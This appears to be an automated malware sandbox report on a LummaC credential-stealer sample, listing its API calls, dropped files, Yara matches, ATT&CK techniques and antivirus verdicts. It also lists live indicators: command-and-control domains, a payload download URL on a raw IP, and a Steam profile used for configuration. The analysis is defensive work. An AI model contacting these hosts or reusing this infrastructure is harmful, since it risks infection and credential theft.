                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024EA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024EA63A
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024D073A
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024CFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024CFB78
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D08CD SetUnhandledExceptionFilter,0_2_024D08CD

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: 86DC.tmp.exeString found in binary or memory: debonairnukk.xyz
                Source: 86DC.tmp.exeString found in binary or memory: diffuculttan.xyz
                Source: 86DC.tmp.exeString found in binary or memory: effecterectz.xyz
                Source: 86DC.tmp.exeString found in binary or memory: deafeninggeh.biz
                Source: 86DC.tmp.exeString found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeProcess created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_004351C0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_0043B282
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_0043B368
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_0043B645
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_0043B875
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024FB271
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_024F5034
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_024F5427
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_024FB4E9
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_024FB534
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: EnumSystemLocalesW,0_2_024FB5CF
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_024FBADC
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024FBBA9
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_024FB8AC
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,0_2_024FB8A3
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024FB9D5
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 3.3.86DC.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.86DC.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.86DC.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.86DC.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 3.3.86DC.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.3.86DC.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.86DC.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.86DC.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024E1B33
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024E0E5D

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Native API                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Screen Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Query Registry                		Remote Desktop Protocol1
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection                		Security Account Manager131
                Security Software Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information                		NTDS1
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture124
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                Obfuscated Files or Information                		LSA Secrets1
                Process Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                Software Packing                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync2
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575332 Sample: AZCFTWko2q.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 12 other signatures 2->50 8 AZCFTWko2q.exe 1 17 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49706, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 104.21.56.70, 443, 49705 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\86DC.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (overwrites its own PE header) 8->52 13 86DC.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 deafeninggeh.biz 104.21.16.1, 443, 49708 CLOUDFLARENETUS United States 13->36 38 immureprech.biz 172.67.207.38, 443, 49707 CLOUDFLARENETUS United States 13->38 40 steamcommunity.com 23.55.153.106, 443, 49711 AKAMAI-ASN1EU United States 13->40 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Detected unpacking (changes PE section rights) 13->58 60 2 other signatures 13->60 17 WerFault.exe 19 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                AZCFTWko2q.exe56%VirustotalBrowse
                AZCFTWko2q.exe55%ReversingLabsWin32.Exploit.LummaC
                AZCFTWko2q.exe100%AviraHEUR/AGEN.1312567
                AZCFTWko2q.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe100%AviraHEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe62%ReversingLabsWin32.Trojan.LummaC
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe62%ReversingLabsWin32.Trojan.LummaC

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://wrathful-jammy.cyou/2100%Avira URL Cloudmalware
                https://deafeninggeh.biz/apio100%Avira URL Cloudmalware
                http://176.113.115.19/ScreenUpdateSync.exe.-0%Avira URL Cloudsafe
                https://sordid-snaked.cyou/apims100%Avira URL Cloudmalware
                https://wrathful-jammy.cyou/pi100%Avira URL Cloudmalware
                http://176.113.115.19/ScreenUpdateSync.exeiD0%Avira URL Cloudsafe
                https://deafeninggeh.biz/i100%Avira URL Cloudmalware
                https://post-to-me.com/Ds100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                post-to-me.com
                		104.21.56.70
                		truefalse
                  		high
                  steamcommunity.com
                  		23.55.153.106
                  		truefalse
                    		high
                    immureprech.biz
                    		172.67.207.38
                    		truefalse
                      		high
                      deafeninggeh.biz
                      		104.21.16.1
                      		truefalse
                        		high
                        sordid-snaked.cyou
                        		unknown
                        		unknownfalse
                          		high
                          diffuculttan.xyz
                          		unknown
                          		unknownfalse
                            		high
                            effecterectz.xyz
                            		unknown
                            		unknownfalse
                              		high
                              awake-weaves.cyou
                              		unknown
                              		unknownfalse
                                		high
                                wrathful-jammy.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  debonairnukk.xyz
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      		high
                                      deafeninggeh.bizfalse
                                        		high
                                        effecterectz.xyzfalse
                                          		high
                                          wrathful-jammy.cyoufalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              awake-weaves.cyoufalse
                                                		high
                                                immureprech.bizfalse
                                                  		high
                                                  https://immureprech.biz/apifalse
                                                    		high
                                                    debonairnukk.xyzfalse
                                                      		high
                                                      diffuculttan.xyzfalse
                                                        		high
                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://immureprech.biz/86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcasts86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://176.113.115.19/ScreenUpdateSync.exe.-AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://store.steampowered.com/subscriber_agreement/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.gstatic.cn/recaptcha/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://deafeninggeh.biz/86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://176.113.115.19/ScreenUpdateSync.exeAZCFTWko2q.exe, AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.valvesoftware.com/legal.htm86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://deafeninggeh.biz/apio86DC.tmp.exe, 00000003.00000003.1595828887.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.google.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af686DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://deafeninggeh.biz/i86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=186DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://steam.tv/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://sordid-snaked.cyou/apims86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://post-to-me.com/track_prt.php?sub=&cc=DEAZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://wrathful-jammy.cyou/pi86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    http://store.steampowered.com/privacy_agreement/86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://wrathful-jammy.cyou/86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/points/shop/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://176.113.115.19/ScreenUpdateSync.exeiDAZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sketchfab.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lv.queniujq.cn86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
